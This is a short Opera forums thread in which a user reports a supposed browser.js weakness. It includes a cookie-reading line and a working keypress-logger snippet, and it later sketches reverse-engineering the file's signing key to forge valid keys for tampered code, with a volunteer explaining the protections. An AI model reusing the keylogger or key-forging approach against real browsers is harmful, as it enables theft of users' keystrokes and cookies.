• Login
    • Search
    • Categories
    • Recent
    • Tags
    • Users
    • Groups
    • Rules
    • Help

    Do more on the web, with a fast and secure browser!

    Download Opera browser with:

    • built-in ad blocker
    • battery saver
    • free VPN
    Download Opera

    browser.js vulnérability virus js

    Suggestions and feature requests
    2
    4
    1542
    Loading More Posts
    • Oldest to Newest
    • Newest to Oldest
    • Most Votes
    Reply
    • Reply as topic
    Log in to reply
    This topic has been deleted. Only users with topic management privileges can see it.
    • A Former User
      A Former User last edited by

      Hello please shudown browser.js
      it very easy to build cookie stealer and real keylogger

      cookie stealer easy
      var MyEasyHack = document.cookie;

      keylogger
      var keys='';
      document.onkeypress = function(e) {
      get = window.event?event:e;
      key = get.keyCode?get.keyCode:get.charCode;
      key = String.fromCharCode(key);
      keys+=key;
      }

      UPDATE

      Reply Quote 0
        1 Reply Last reply
      • burnout426
        burnout426 Volunteer last edited by

        If something modifies browser.js, Opera should quit using browser.js because the key at the top will then be invalid. Whatever modifies it will have to regenerate a valid key. There will also be a new file in a different folder on update.

        Not saying it's impossible, but there are protections in place. Also, as for the actual code in browser.js, before the page loads, the browser.js code caches functions that it uses so it's not using copies that are overwritten (tampered with) by the page.

        Reply Quote 0
          1 Reply Last reply
        • A Former User
          A Former User last edited by

          thanks for the reply

          for the key it should be the same as creating keygen ?

          debug -> get logic -> make tool with logic -> post data -> get key

          Reply Quote 0
            burnout426 1 Reply Last reply
          • burnout426
            burnout426 Volunteer @Guest last edited by

            @errzerraxxdev Yeah, if you can figure out how the key is created for the content, you should then be able to produce a valid key for your modifications, I would think.

            Reply Quote 0
              1 Reply Last reply
            • First post
              Last post

            Computer browsers

            • Opera for Windows
            • Opera for Mac
            • Opera for Linux
            • Opera beta version
            • Opera USB

            Mobile browsers

            • Opera for Android
            • Opera Mini
            • Opera Touch
            • Opera for basic phones

            • Add-ons
            • Opera account
            • Wallpapers
            • Opera Ads

            • Help & support
            • Opera blogs
            • Opera forums
            • Dev.Opera

            • Security
            • Privacy
            • Cookies Policy
            • EULA
            • Terms of Service

            • About Opera
            • Press info
            • Jobs
            • Investors
            • Become a partner
            • Contact us

            Follow Opera

            • Opera - Facebook
            • Opera - Twitter
            • Opera - YouTube
            • Opera - LinkedIn
            • Opera - Instagram

            © Opera Software 1995-